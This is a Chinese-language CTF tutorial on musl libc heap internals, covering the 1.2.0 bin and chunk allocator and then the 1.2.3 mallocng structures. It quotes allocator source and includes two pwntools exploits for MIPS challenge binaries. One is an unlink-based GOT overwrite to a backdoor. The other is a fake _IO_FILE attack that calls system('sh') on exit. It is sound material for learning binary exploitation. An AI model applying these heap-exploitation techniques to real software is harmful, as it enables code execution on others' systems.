Musl heap (musl-1.2.0)

本节例题以mips32架构为例：https://github.com/jelasin/MAPwn/tree/master/mips32，本节基础知识讲解部分以 64 位为例。

musl libc在内存分配上经历过一次大的改动（1.2.0->1.2.1），其余版本之间变化不大，这里以 1.2.0 版本为例进行分析。

数据结构

mal

static struct {
    volatile uint64_t binmap;
    struct bin bins[64];
    volatile int free_lock[2];
} mal;

mal 结构体类似于 glibc 中的 arena ，记录着堆的状态，有三个成员：64位无符号整数 binmap ，链表头部数组 bins 和锁 free_lock 。

binmap记录每个 bin 是否为非空，若某个比特位为 1，表示对应的 bin 为非空，即 bin 链表中有 chunk。

bins[64] 为 64 个 chunk 的链表头，分别维护 64 个存放空闲 chunk 的双向链表。每个下标对应的链表存放 chunk 的大小范围如下。

index	min size	max size (+0x1F)
0	0x20	0x20
1	0x40	0x40
2	0x60	0x60
3	0x80	0x80
4	0xa0	0xa0
5	0xc0	0xc0
6	0xe0	0xe0
7	0x100	0x100
8	0x120	0x120
9	0x140	0x140
10	0x160	0x160
11	0x180	0x180
12	0x1a0	0x1a0
13	0x1c0	0x1c0
14	0x1e0	0x1e0
15	0x200	0x200
16	0x220	0x220
17	0x240	0x240
18	0x260	0x260
19	0x280	0x280
20	0x2a0	0x2a0
21	0x2c0	0x2c0
22	0x2e0	0x2e0
23	0x300	0x300
24	0x320	0x320
25	0x340	0x340
26	0x360	0x360
27	0x380	0x380
28	0x3a0	0x3a0
29	0x3c0	0x3c0
30	0x3e0	0x3e0
31	0x400	0x400
32	0x420	0x420
33	0x440	0x520
34	0x540	0x620
35	0x640	0x720
36	0x740	0x820
37	0x840	0xa20
38	0xa40	0xc20
39	0xc40	0xe20
40	0xe40	0x1020
41	0x1040	0x1420
42	0x1440	0x1820
43	0x1840	0x1c20
44	0x1c40	0x2020
45	0x2040	0x2820
46	0x2840	0x3020
47	0x3040	0x3820
48	0x3840	0x4020
49	0x4040	0x5020
50	0x5040	0x6020
51	0x6040	0x7020
52	0x7040	0x8020
53	0x8040	0xa020
54	0xa040	0xc020
55	0xc040	0xe020
56	0xe040	0x10020
57	0x10040	0x14020
58	0x14040	0x18020
59	0x18040	0x1c020
60	0x1c040	0x20020
61	0x20040	0x28020
62	0x28040	0x30020
63	0x30040	0x38000

bin

struct bin {
    volatile int lock[2];
    struct chunk *head;
    struct chunk *tail;
};

存放空闲 chunk 的双向链表，存放 chunk 从 tail 端放，取 chunk 从 head 端取。
bin 中的 head 和 tail 初始为 0 ，但是在使用 bin 时一般会先调用 lock_bin ，此时如果 bin 为空会将 head 和 tail 设为 &bin[i] - 0x10 。

static inline void lock_bin(int i) {
    lock(mal.bins[i].lock);
    if (!mal.bins[i].head)
        mal.bins[i].head = mal.bins[i].tail = BIN_TO_CHUNK(i);
}

chunk

struct chunk {
    size_t psize, csize;
    struct chunk *next, *prev;
};

chunk 头部结构跟 glibc 差不多，不过没有 nextsize 指针，chunk 之间不重用 psize 字段。
psize 和 csize 字段都有标志位（glibc 只有 size 字段有），但只有一种位于最低位的标志位 C_INUSE（glibc 最低三位都有标志位）。若 csize 设置 C_INUSE 标志位（最低位为 1 ），表示 chunk 正在被使用；若没有设置 C_INUSE 标志位（最低位为 0 ），表示 chunk 已经被释放或者通过 mmap 分配的，需要通过 psize 的标志位来进一步判断 chunk 的状态。若 psize 设置 C_INUSE 标志位表示前一个 chunk 正在被使用。另外，chunk 的大小关于 0x20 对齐。

宏定义

chunk 的相关宏定义如下：

#define SIZE_ALIGN (4*sizeof(size_t))
#define SIZE_MASK (-SIZE_ALIGN)
#define OVERHEAD (2*sizeof(size_t))
#define MMAP_THRESHOLD (0x1c00*SIZE_ALIGN)
#define DONTCARE 16
#define RECLAIM 163840

#define CHUNK_SIZE(c) ((c)->csize & -2)
#define CHUNK_PSIZE(c) ((c)->psize & -2)
#define PREV_CHUNK(c) ((struct chunk *)((char *)(c) - CHUNK_PSIZE(c)))
#define NEXT_CHUNK(c) ((struct chunk *)((char *)(c) + CHUNK_SIZE(c)))
#define MEM_TO_CHUNK(p) (struct chunk *)((char *)(p) - OVERHEAD)
#define CHUNK_TO_MEM(c) (void *)((char *)(c) + OVERHEAD)
#define BIN_TO_CHUNK(i) (MEM_TO_CHUNK(&mal.bins[i].head))

#define C_INUSE  ((size_t)1)

#define IS_MMAPPED(c) !((c)->csize & (C_INUSE))

unbin

将 chunk 从 bins 中取出，并更新 binmap 。

static void unbin(struct chunk *c, int i) {
    if (c->prev == c->next)
        a_and_64(&mal.binmap, ~(1ULL << i));
    c->prev->next = c->next;
    c->next->prev = c->prev;
    c->csize |= C_INUSE;
    NEXT_CHUNK(c)->psize |= C_INUSE;
}

当满足 c->prev != c->next 时可以不将 mal.binmap 清空。

alloc_fwd & alloc_rev

static int alloc_fwd(struct chunk *c) {
    int i;
    size_t k;
    while (!((k = c->csize) & C_INUSE)) {
        i = bin_index(k);
        lock_bin(i);
        if (c->csize == k) {
            unbin(c, i);
            unlock_bin(i);
            return 1;
        }
        unlock_bin(i);
    }
    return 0;
}

static int alloc_rev(struct chunk *c) {
    int i;
    size_t k;
    while (!((k = c->psize) & C_INUSE)) {
        i = bin_index(k);
        lock_bin(i);
        if (c->psize == k) {
            unbin(PREV_CHUNK(c), i);
            unlock_bin(i);
            return 1;
        }
        unlock_bin(i);
    }
    return 0;
}

alloc_fwd 通过当前 chunk 的 csize 检查当前 chunk 是否空闲，如果空闲调用 unbin 函数将当前 chunk 从 bins 链表中取出。
alloc_rev 通过当前 chunk 的 psize 检查当前 chunk 的前一个 chunk 是否空闲，如果空闲调用 unbin 函数将当前 chunk 的前一个 chunk 从 bins 链表中取出。

函数分析

malloc

首先调用 adjust_size 检查申请内存大小是否合理并将申请的内存大小转换为 chunk 大小，具体转换规则为加 0x10 然后关于 0x20 向上对齐。

static int adjust_size(size_t *n) {
    /* Result of pointer difference must fit in ptrdiff_t. */
    if (*n - 1 > PTRDIFF_MAX - SIZE_ALIGN - PAGE_SIZE) {
        if (*n) {
            errno = ENOMEM;
            return -1;
        } else {
            *n = SIZE_ALIGN;
            return 0;
        }
    }
    *n = (*n + OVERHEAD + SIZE_ALIGN - 1) & SIZE_MASK;
    return 0;
}

    if (adjust_size(&n) < 0) return 0;

如果 chunk 大小超过 MMAP_THRESHOLD（即 0x38000 ）则直接 mmap 分配 chunk 。

if (n > MMAP_THRESHOLD) {
    size_t len = n + OVERHEAD + PAGE_SIZE - 1 & -PAGE_SIZE;
    char *base = __mmap(0, len, PROT_READ | PROT_WRITE,
                        MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == (void *) -1) return 0;
    c = (void *) (base + SIZE_ALIGN - OVERHEAD);
    c->csize = len - (SIZE_ALIGN - OVERHEAD);
    c->psize = SIZE_ALIGN - OVERHEAD;
    return CHUNK_TO_MEM(c);
}

mmap 得到的 chunk 结构如下，注意该 chunk 的 psize 和 csize 的 C_INUSE 标志位均没有置位且没有下一个 chunk 。

如果大小不超过 MMAP_THRESHOLD 则先通过 bin_index_up 函数计算 chunk 大小对应的 bin 数组下标 i 。然后通过 mal.binmap 获取下标大于等于 i 的非空 bin 。接下来是两种情况，如果没有则调用 expand_heap 函数扩展堆然后调用 alloc_rev 将新扩展的堆块和前面空闲的堆块合并然后跳出循环，否则调用 first_set 函数获取大于等于 i 的最小下标，然后利用 pretrim 或 unbin 将 chunk 从 bin 链表中取出，最终也会跳出循环。这两种情况最终都会调用 trim 函数，这个函数的作用是从 c 上切下一块 chunk 用于内存分配，剩下的释放掉。

void *malloc(size_t n)
{
	struct chunk *c;
	int i, j;

	if (adjust_size(&n) < 0) return 0;

	if (n > MMAP_THRESHOLD) {
		size_t len = n + OVERHEAD + PAGE_SIZE - 1 & -PAGE_SIZE;
		char *base = __mmap(0, len, PROT_READ|PROT_WRITE,
			MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
		if (base == (void *)-1) return 0;
		c = (void *)(base + SIZE_ALIGN - OVERHEAD);
		c->csize = len - (SIZE_ALIGN - OVERHEAD);
		c->psize = SIZE_ALIGN - OVERHEAD;
		return CHUNK_TO_MEM(c);
	}

	i = bin_index_up(n);
	for (;;) {
		uint64_t mask = mal.binmap & -(1ULL<<i);
		if (!mask) {
			c = expand_heap(n);
			if (!c) return 0;
			if (alloc_rev(c)) {
				struct chunk *x = c;
				c = PREV_CHUNK(c);
				NEXT_CHUNK(x)->psize = c->csize =
					x->csize + CHUNK_SIZE(c);
			}
			break;
		}
		j = first_set(mask);
		lock_bin(j);
		c = mal.bins[j].head;
		if (c != BIN_TO_CHUNK(j)) {
			if (!pretrim(c, n, i, j)) unbin(c, j);
			unlock_bin(j);
			break;
		}
		unlock_bin(j);
	}

	/* Now patch up in case we over-allocated */
	trim(c, n);

	return CHUNK_TO_MEM(c);
}

expand_heap

首先将需要扩展的大小 n 加上 SIZE_ALIGN（0x20），之后调用 __expand_heap 扩展堆并返回扩展后的内存的起始地址。

/* The argument n already accounts for the caller's chunk
 * overhead needs, but if the heap can't be extended in-place,
 * we need room for an extra zero-sized sentinel chunk. */
n += SIZE_ALIGN;

lock(heap_lock);

p = __expand_heap(&n);
if (!p) {
    unlock(heap_lock);
    return 0;
}

如果新扩展的内存的起始地址不等于上一段扩展的内存的结束地址说明内存扩展不连续或者是第一次获取内存，需要在新扩展的 chunk 前面设置一个 sentinel chunk 。

/* If not just expanding existing space, we need to make a
 * new sentinel chunk below the allocated space. */
if (p != end) {
    /* Valid/safe because of the prologue increment. */
    n -= SIZE_ALIGN;
    p = (char *) p + SIZE_ALIGN;
    w = MEM_TO_CHUNK(p);
    w->psize = 0 | C_INUSE;
}

之后设置新扩展的 chunk 和下一个 chunk 的头部信息。

/* Record new heap end and fill in footer. */
end = (char *) p + n;
w = MEM_TO_CHUNK(end);
w->psize = n | C_INUSE;
w->csize = 0 | C_INUSE;

/* Fill in header, which may be new or may be replacing a
 * zero-size sentinel header at the old end-of-heap. */
w = MEM_TO_CHUNK(p);
w->csize = n | C_INUSE;

unlock(heap_lock);

return w;

这里假设连续调用两次 expand_heap，则内存分布如下。由此可知道前面 n += SIZE_ALIGN; 是为了确保如果是不连续或第一次扩展堆时有可以有空间提供 sentinel chunk 和下一个 chunk 的头部。

__expand_heap

首先检验扩展的大小 n 是否合理，之后将 n 关于页大小向上对齐。

if (n > SIZE_MAX / 2 - PAGE_SIZE) {
    errno = ENOMEM;
    return 0;
}
n += -n & PAGE_SIZE - 1;

如果 heap 段还没有初始化过则通过 brk(0) 系统调用获取 heap 段基址，并将 brk 关于页面大小向上对齐。

if (!brk) {
    brk = __syscall(SYS_brk, 0);
    brk += -brk & PAGE_SIZE - 1;
}

如果满足 brk 调用条件且 brk 调用正常则直接返回得到的内存。

if (n < SIZE_MAX - brk && !traverses_stack_p(brk, brk + n)
    && __syscall(SYS_brk, brk + n) == brk + n) {
    *pn = n;
    brk += n;
    return (void *) (brk - n);
}

否则调用 mmap 扩展内存，扩展内存的大小为 max(n, PAGE_SIZE << mmap_step / 2) 同时将 mmap_step 加 1 。

size_t min = (size_t) PAGE_SIZE << mmap_step / 2;
if (n < min) n = min;
void *area = __mmap(0, n, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (area == MAP_FAILED) return 0;
*pn = n;
mmap_step++;
return area;

pretrim

pretrim 函数的作用是如果申请的 chunk 中切下所需的部分剩余部分可以放到该 chunk 所在 bins 中则直接从该 chunk 中切下所需部分返回。如果满足上述条件，这样做可以减少一次 unbin 和 pretrim 从而提高程序效率。

首先这里特判了一些不需要 pretrim 的情况。总的来说就是 chunk 或切完剩下的 chunk 太小的时候不需要 pretrim 。

if (j < 40) return 0;
if (j < i + 3) {
    if (j != 63) return 0;
    n1 = CHUNK_SIZE(self);
    if (n1 - n <= MMAP_THRESHOLD) return 0;
} else {
    n1 = CHUNK_SIZE(self);
}

之后判断如果满足 pretrim 的条件就将 self 分裂为 self 和 split，spit 放到 bins 中原来 self 所在位置，然后把新的 self 返回。

if (bin_index(n1 - n) != j) return 0;

next = NEXT_CHUNK(self);
split = (void *) ((char *) self + n);

split->prev = self->prev;
split->next = self->next;
split->prev->next = split;
split->next->prev = split;
split->psize = n | C_INUSE;
split->csize = n1 - n;
next->psize = n1 - n;
self->csize = n | C_INUSE;
return 1;

trim

如果从申请的 chunk 切下所需 chunk 后剩余部分还能构成一个 chunk 就切下所需 chunk 并发剩余部分调用 __bin_chunk 函数释放。

static void trim(struct chunk *self, size_t n) {
    size_t n1 = CHUNK_SIZE(self);
    struct chunk *next, *split;

    if (n >= n1 - DONTCARE) return;

    next = NEXT_CHUNK(self);
    split = (void *) ((char *) self + n);

    split->psize = n | C_INUSE;
    split->csize = n1 - n | C_INUSE;
    next->psize = n1 - n | C_INUSE;
    self->csize = n | C_INUSE;

    __bin_chunk(split);
}

free

首先特判传入指针为空的情况。之后判断如果 csize 的 C_INUSE 位为空则通过 psize 找到 mmap 的起始地址 base 和 mmap 的内存长度 len 。之后如果 extra & 1 则终止程序，如果直接 double free 一块非 mmap 的内存就是这个结果。之后调用 __munmap 释放这块内存。如果不是 mmap 得到的 chunk 则调用 __bin_chunk 释放 chunk 。

static void unmap_chunk(struct chunk *self) {
    size_t extra = self->psize;
    char *base = (char *) self - extra;
    size_t len = CHUNK_SIZE(self) + extra;
    /* Crash on double free */
    if (extra & 1) a_crash();
    __munmap(base, len);
}

#define IS_MMAPPED(c) !((c)->csize & (C_INUSE))

void free(void *p) {
    if (!p) return;

    struct chunk *self = MEM_TO_CHUNK(p);

    if (IS_MMAPPED(self))
        unmap_chunk(self);
    else
        __bin_chunk(self);
}

__bin_chunk

获取 chunk 的大小并初始化 final_size 和 new_size 。

1	final_size = new_size = CHUNK_SIZE(self);

检测 next->psize 和 self->csize 是否相等。

struct chunk *next = NEXT_CHUNK(self);
...
/* Crash on corrupted footer (likely from buffer overflow) */
if (next->psize != self->csize) a_crash();

将该 chunk 与前后的空闲 chunk 合并直至满足 self->psize & next->csize & C_INUSE 条件，即该 chunk 前后都没有空闲 chunk 。
期间如果满足 new_size + size > RECLAIM && (new_size + size ^ size) > size （其中 RECLAIM 为 0x28000）则 reclaim 置 1 ，之后会对释放的 chunk 包含的所有完整物理页调用 madvise 设置 lazyfree 标志，这样在内存紧缺的时候会回收这些物理页。

for (;;) {
    if (self->psize & next->csize & C_INUSE) {
        self->csize = final_size | C_INUSE;
        next->psize = final_size | C_INUSE;
        i = bin_index(final_size);
        lock_bin(i);
        lock(mal.free_lock);
        if (self->psize & next->csize & C_INUSE)
            break;
        unlock(mal.free_lock);
        unlock_bin(i);
    }

    if (alloc_rev(self)) {
        self = PREV_CHUNK(self);
        size = CHUNK_SIZE(self);
        final_size += size;
        if (new_size + size > RECLAIM && (new_size + size ^ size) > size)
            reclaim = 1;
    }

    if (alloc_fwd(next)) {
        size = CHUNK_SIZE(next);
        final_size += size;
        if (new_size + size > RECLAIM && (new_size + size ^ size) > size)
            reclaim = 1;
        next = NEXT_CHUNK(next);
    }
}

之后更新 binmap 以及 chunk 头部各个字段，然后将 chunk 从对应 bins 的 tail 加入到链表中。最后对于 reclaim 为 1 的情况做相应的处理。

    if (!(mal.binmap & 1ULL << i))
        a_or_64(&mal.binmap, 1ULL << i);

    self->csize = final_size;
    next->psize = final_size;
    unlock(mal.free_lock);

    self->next = BIN_TO_CHUNK(i);
    self->prev = mal.bins[i].tail;
    self->next->prev = self;
    self->prev->next = self;

    /* Replace middle of large chunks with fresh zero pages */
    if (reclaim) {
        uintptr_t a = (uintptr_t) self + SIZE_ALIGN + PAGE_SIZE - 1 & -PAGE_SIZE;
        uintptr_t b = (uintptr_t) next - SIZE_ALIGN & -PAGE_SIZE;
#if 1
        __madvise((void *) a, b - a, MADV_DONTNEED);
#else
        __mmap((void *)a, b-a, PROT_READ|PROT_WRITE,
            MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
#endif
    }

    unlock_bin(i);

堆利用

unlink

musl 采用 unbin 函数从 bins 中取出 chunk ，对应 glibc 中的 unlink ，但是 unbin 中检查不足没有检查链表完整性，可以进行利用实现任意地址写。如果泄露了堆地址还可以写 rop 链进行 ROP 。unlink 的作用是可以在两位置写入可读写地址，很多攻击手法都是建立在 unlink 的基础上的。

static void unbin(struct chunk *c, int i) {
    if (c->prev == c->next)
        a_and_64(&mal.binmap, ~(1ULL << i));
    c->prev->next = c->next;
    c->next->prev = c->prev;
    c->csize |= C_INUSE;
    NEXT_CHUNK(c)->psize |= C_INUSE;
}

exp

def unlink():
    heap_arr = 0x4120A0
    add(0, 0x20)  # chunk0
    add(1, 0x20)  # chunk1
    edit(0, 0x2c, flat([b'\x00\x00\x00\x01', p32(0x28), # psize->C_INUSE=1 csize->C_INUSE=0
                        heap_arr+0x10, heap_arr+0x10, 
                        b'\x00'*0x18, b'\x00\x00\x00\x28'])) # next->next->psize==curr->csize
    
    dele(1)

    edit(6, 0x4, p32(0x412024)) # free_got
    edit(4, 0x4, p32(0x4007F0)) # back_door
    cmd('2')
    ru("Enter index to free:\n")
    sl("0")

这个 poc 是通过 chunk 合并来触发的 unlink ，因此需要满足以下条件：

为了 free 函数能够调用 __bin_chunk 需要 next_chunk 的 csize 的 C_INUSE 位置 1 。
为了绕过 if (next->psize != self->csize) a_crash(); 检测需要伪造 next_chunk 的 csize 和 next_chunk 的下一个 chunk 的 psize。
为了使 alloc_rev 调用 unbin 函数将 fake_chunk 解链，满足 next_chunk->psize 的 C_INUSE 位不置位。

IO_FILE 利用

00000000 struct __attribute__((aligned(8))) _IO_FILE // sizeof=0x90
00000000 {                                       // XREF: FILE/r
00000000     unsigned int flags;
00000004     unsigned __int8 *rpos;              // XREF: strtoull+48/w
00000004                                         // strtoull+8C/r ...
00000008     unsigned __int8 *rend;              // XREF: strtoull+44/w
00000008                                         // strtoll+44/w ...
0000000C     int (*close)(FILE *);
00000010     unsigned __int8 *wend;
00000014     unsigned __int8 *wpos;
00000018     unsigned __int8 *mustbezero_1;
0000001C     unsigned __int8 *wbase;
00000020     size_t (*read)(FILE *, unsigned __int8 *, size_t);
00000024     size_t (*write)(FILE *, const unsigned __int8 *, size_t);
00000028     off_t (*seek)(FILE *, off_t, int);
0000002C     unsigned __int8 *buf;               // XREF: strtoull+4C/w
0000002C                                         // strtoull+88/r ...
00000030     size_t buf_size;
00000034     FILE *prev;
00000038     FILE *next;
0000003C     int fd;
00000040     int pipe_pid;
00000044     int lockcount;
00000048     int mode;
0000004C     volatile int lock;
00000050     int lbf;
00000054     void *cookie;
00000058     off_t off;
00000060     char *getln_buf;
00000064     void *mustbezero_2;
00000068     unsigned __int8 *shend;
0000006C     // padding byte
0000006D     // padding byte
0000006E     // padding byte
0000006F     // padding byte
00000070     off_t shlim;
00000078     off_t shcnt;                        // XREF: strtoull+98/r
00000078                                         // strtoll+98/r ...
00000080     FILE *prev_locked;
00000084     FILE *next_locked;
00000088     __locale_struct *locale;
0000008C     // padding byte
0000008D     // padding byte
0000008E     // padding byte
0000008F     // padding byte
00000090 };

exit 调用链

分析 exit 函数的调用链，发现最终会调用

FILE *volatile __stdin_used = &__stdin_FILE;
FILE *volatile __stdout_used = &__stdout_FILE;
FILE *volatile __stderr_used = &__stderr_FILE;

_Noreturn void exit(int code) {
    __funcs_on_exit();
    __libc_exit_fini();
    __stdio_exit();
    _Exit(code);
}

void __stdio_exit(void) {
    FILE *f;
    for (f = *__ofl_lock(); f; f = f->next) close_file(f);
    close_file(__stdin_used);
    close_file(__stdout_used);
    close_file(__stderr_used);
}

static void close_file(FILE *f) {
    if (!f) return;
    FFINALLOCK(f);
    if (f->wpos != f->wbase) f->write(f, 0, 0);
    if (f->rpos != f->rend) f->seek(f, f->rpos - f->rend, SEEK_CUR);
}

可以看到 close_file 中可能会调用三个 FILE 的 write 和 seek 函数指针。我们要修改的也正是这两个指针。在没有沙箱的情况下，只需要将 FILE 结构体开头的几个字节修改为 /bin/sh ，再修改 write 指针的值为 system ，以及修改 f->wpos 、f->wbase 中其中之一就可以调用到 system("/bin/sh") 。

总结来说，就是在无沙箱时，需要修改 _IO_FILE 结构体的几个地方：

起始位置写入 /bin/sh
f->wpos 、f->wbase 中其中之一使得二者不等
write 写入 system 函数地址。
最好将 lock 设置为小于 0 避免程序卡死在 __lockfile 函数中。（等于 0 貌似也可以）

FFINALLOCK(f);
//定义:  
#define FFINALLOCK(f) ((f)->lock >= 0 ? __lockfile((f)) : 0)
//替换:  
((f)->lock >= 0 ? __lockfile((f)) : 0)

puts 调用链

分析 puts 函数的调用链，发现最终会调用

int puts(const char *s) {
    int r;
    FLOCK(stdout);
    r = -(fputs(s, stdout) < 0 || putc_unlocked('\n', stdout) < 0);
    FUNLOCK(stdout);
    return r;
}

int fputs(const char *restrict s, FILE *restrict f) {
    size_t l = strlen(s);
    return (fwrite(s, 1, l, f) == l) - 1;
}

size_t fwrite(const void *restrict src, size_t size, size_t nmemb, FILE *restrict f) {
    size_t k, l = size * nmemb;
    if (!size) nmemb = 0;
    FLOCK(f);
    k = __fwritex(src, l, f);
    FUNLOCK(f);
    return k == l ? nmemb : k / size;
}

int __towrite(FILE *f) {
    ...
    if (f->flags & F_NOWR) {
        f->flags |= F_ERR;
        return EOF;
    }
    ...
    return 0;
}

size_t __fwritex(const unsigned char *restrict s, size_t l, FILE *restrict f) {
    size_t i = 0;

    if (!f->wend && __towrite(f)) return 0;

    if (l > f->wend - f->wpos) return f->write(f, s, l);
    ...
}

exp

def FSOP():
    heap_arr = 0x4120A0
    add(0, 0xa0)  # chunk0
    add(1, 0xa0)  # chunk1
    libc.address = u32(show(0, 0x4)) - 0xdd008
    heap_addr = libc.address + 0xded50
    stdin_used = libc.symbols['__stdin_used']
    log.success(f"libc_base: {hex(libc.address)}")
    log.success(f"heap_addr: {hex(heap_addr)}")
    log.success(f"stdin_used: {hex(stdin_used)}")

    edit(0, 0xac, flat([b'\x00\x00\x00\x01', p32(0xa8), 
                        heap_arr+0x4*0x4, heap_arr+0x4*0x4, 
                        b'\x00'*0x98, b'\x00\x00\x00\xa8']))
    dele(1)

    edit(6, 0x4, p32(stdin_used))
    edit(4, 0x4, p32(heap_addr))

    fake_file = b''
    fake_file += b"sh".ljust(4, b'\x00')  # flags
    fake_file += p32(0)  # rpos
    fake_file += p32(0)  # rend
    fake_file += p32(0)  # close
    fake_file += p32(0)  # wend
    fake_file += p32(0x114)  # wpos
    fake_file += p32(0)  # mustbezero_1
    fake_file += p32(0x514)  # wbase
    fake_file += p32(0)  # read
    fake_file += p32(libc.sym['system'])  # write
    fake_file = fake_file.ljust(0x90, b'\x00')  # lock = 0
    edit(0, 0xa0, flat([fake_file]))
    cmd('5')

Musl heap (musl-1.2.3)

源码：https://elixir.bootlin.com/musl/v1.2.3/source/src/malloc/mallocng/meta.h#L24

本文例题以mips64架构为例：https://github.com/jelasin/MAPwn/tree/master/mips64

数据结构

deque

musl 内存管理时经常使用双向链表来缓存一些 meta 的结构，我们暂且称它为 deque 。

对应的操作有 queue，dequeue，dequeue_head 三个操作。

queue

queue 函数的作用是将 *m 插入到 *phead 指向的 deque 中。

static inline void queue(struct meta **phead, struct meta *m) {
    assert(!m->next);
    assert(!m->prev);
    if (*phead) {
        struct meta *head = *phead;
        m->next = head;
        m->prev = head->prev;
        m->next->prev = m->prev->next = m;
    } else {
        m->prev = m->next = m;
        *phead = m;
    }
}

dequeue

dequeue 函数的作用是将 *m 从 *phead 指向的 deque 中取出。

static inline void dequeue(struct meta **phead, struct meta *m) {
    if (m->next != m) {
        m->prev->next = m->next;
        m->next->prev = m->prev;
        if (*phead == m) *phead = m->next;
    } else {
        *phead = 0;
    }
    m->prev = m->next = 0;
}

dequeue_head

dequeue_head 函数的作用是将 *phead 指向的 meta 结构从 *phead 指向的 deque 中取出。

static inline struct meta *dequeue_head(struct meta **phead) {
    struct meta *m = *phead;
    if (m) dequeue(phead, m);
    return m;
}

malloc_context

#define PAGESIZE 4096

struct malloc_context {
    uint64_t secret;
#ifndef PAGESIZE
    size_t pagesize;
#endif
    int init_done;
    unsigned mmap_counter;
    struct meta *free_meta_head;
    struct meta *avail_meta;
    size_t avail_meta_count, avail_meta_area_count, meta_alloc_shift;
    struct meta_area *meta_area_head, *meta_area_tail;
    unsigned char *avail_meta_areas;
    struct meta *active[48];
    size_t usage_by_class[48];
    uint8_t unmap_seq[32], bounces[32];
    uint8_t seq;
    uintptr_t brk;
};

这个结构体是musl libc的堆管理最上层结构，其中字段的含义分别为：

uint64_t secret：一个随机生成的数，用于检查meta的合法性，也即一个 check guard 。
int init_done：判断 malloc_context 是否初始化完成，在 alloc_meta 函数中进行检查，如果没有则进行初始化，否则跳过初始化流程，这里的初始化指的是初始化 secret 。
unsigned mmap_counter：mmap 计数器，通过 mmap 分配了多少次空间用于内存分配。
struct meta *free_meta_head：被释放的 meta 结构体构成的双向链表表头，meta 结构体是 musl libc 内存分配的低一级结构。
struct meta *avail_meta：指向空闲的 meta 。
size_t avail_meta_count：musl 保留但未使用的 meta 的数量。
avail_meta_area_count：musl 保留但未使用的 meta_area 的数量。
meta_alloc_shift：当没有空闲 meta_area 且 brk 不能为 meta_arena 申请连续内存时需要采用 mmap 的方式申请 meta_arena，meta_alloc_shift 用于计算了此时需要扩展的内存大小，这个值是动态调节的。
struct meta_area *meta_area_head, *meta_area_tail：存放 meta_area 的单向链表，只作记录，没什么实际作用。
unsigned char *avail_meta_areas：musl 保留但未使用的 meta_area 的起始地址，具体见后面对 alloc_meta 函数的分析。

struct meta *active[48]：可以直接参与内存分配的 meta，按照 meta 管理的内存中 chunk 的大小划分为 48 组，每个组由 meta 形成一个 deque 。
48 个组中 chunk 大小以及 malloc 的 size 大小对应关系如下：

sc	chunk size	min size	max size
0	0x10	0x0	0xc
1	0x20	0xd	0x1c
2	0x30	0x1d	0x2c
3	0x40	0x2d	0x3c
4	0x50	0x3d	0x4c
5	0x60	0x4d	0x5c
6	0x70	0x5d	0x6c
7	0x80	0x6d	0x7c
8	0x90	0x7d	0x8c
9	0xa0	0x8d	0x9c
10	0xc0	0x9d	0xbc
11	0xf0	0xbd	0xec
12	0x120	0xed	0x11c
13	0x140	0x11d	0x13c
14	0x190	0x13d	0x18c
15	0x1f0	0x18d	0x1ec
16	0x240	0x1ed	0x23c
17	0x2a0	0x23d	0x29c
18	0x320	0x29d	0x31c
19	0x3f0	0x31d	0x3ec
20	0x480	0x3ed	0x47c
21	0x540	0x47d	0x53c
22	0x660	0x53d	0x65c
23	0x7f0	0x65d	0x7ec
24	0x920	0x7ed	0x91c
25	0xaa0	0x91d	0xa9c
26	0xcc0	0xa9d	0xcbc
27	0xff0	0xcbd	0xfec
28	0x1240	0xfed	0x123c
29	0x1540	0x123d	0x153c
30	0x1990	0x153d	0x198c
31	0x1ff0	0x198d	0x1fec
32	0x2480	0x1fed	0x247c
33	0x2aa0	0x247d	0x2a9c
34	0x3320	0x2a9d	0x331c
35	0x3ff0	0x331d	0x3fec
36	0x4910	0x3fed	0x490c
37	0x5540	0x490d	0x553c
38	0x6650	0x553d	0x664c
39	0x7ff0	0x664d	0x7fec
40	0x9240	0x7fed	0x923c
41	0xaaa0	0x923d	0xaa9c
42	0xccc0	0xaa9d	0xccbc
43	0xfff0	0xccbd	0xffec
44	0x12480	0xffed	0x1247c
45	0x15540	0x1247d	0x1553c
46	0x19980	0x1553d	0x1997c
47	0x1fff0	0x1997d	0x1ffec

size_t usage_by_class[48]：对应大小的缓存的所有 meta 的 group 所管理的 chunk 个数。
uint8_t unmap_seq[32], bounces[32]：参与 alloc_group 中计算新分配 group 的大小。
uint8_t seq：参与 alloc_group 中计算新分配 group 的大小。
uintptr_t brk：记录目前的 brk(0) ，如果 brk 不能分配连续内存则该值设为 -1 。

malloc_context 被实例化为全局变量 ctx 。

1
2
3

#define ctx __malloc_context

__attribute__((__visibility__("hidden"))) extern struct malloc_context ctx;

meta_area

struct meta_area {
    uint64_t check;
    struct meta_area *next;
    int nslots;
    struct meta slots[];
};

这个结构用于管理一页内的所有 meta 结构，属于 malloc_context 的下级结构，meta 的上级结构。

uint64_t check：检查字段，与 malloc_context 中的 secret 字段对应，检查该 meta_area 是否可能被修改
struct meta_area *next：下一个meta_area的地址，与前面 malloc_context 的 struct meta_area *meta_area_head, *meta_area_tail 一起构成单向链表，存放空闲的 meta_area ，正常使用中的 meta_area 该字段为 0 。
int nslots：该 meta_area 中管理的 meta 数量，一般为固定值。
struct meta slots[]：管理的 meta 数组

group

struct group {
    struct meta *meta;
    unsigned char active_idx : 5;
    char pad[UNIT - sizeof(struct meta *) - 1];
    unsigned char storage[];
};

group中即保存有需要分配出去的chunk。

struct meta *meta：所属的meta的地址
unsigned char active_idx:5：5个比特，表示还有多少可用chunk
char pad[UNIT - sizeof(struct meta *) - 1]：手动16字节对齐
unsigned char storage[]：要分配出去的内存空间，chunk

alloc_group

首先获取一个 meta ，然后根据经验以及当前内存状态计算出需要申请的 group 中 chunk 的数量。

size_t size = UNIT * size_classes[sc];
int i = 0, cnt;
unsigned char *p;
struct meta *m = alloc_meta();
if (!m) return 0;
size_t usage = ctx.usage_by_class[sc];
size_t pagesize = PGSZ;
int active_idx;
if (sc < 9) {
    while (i < 2 && 4 * small_cnt_tab[sc][i] > usage)
        i++;
    cnt = small_cnt_tab[sc][i];
} else {
    // lookup max number of slots fitting in power-of-two size
    // from a table, along with number of factors of two we
    // can divide out without a remainder or reaching 1.
    cnt = med_cnt_tab[sc & 3];

    // reduce cnt to avoid excessive eagar allocation.
    while (!(cnt & 1) && 4 * cnt > usage)
        cnt >>= 1;

    // data structures don't support groups whose slot offsets
    // in units don't fit in 16 bits.
    while (size * cnt >= 65536 * UNIT)
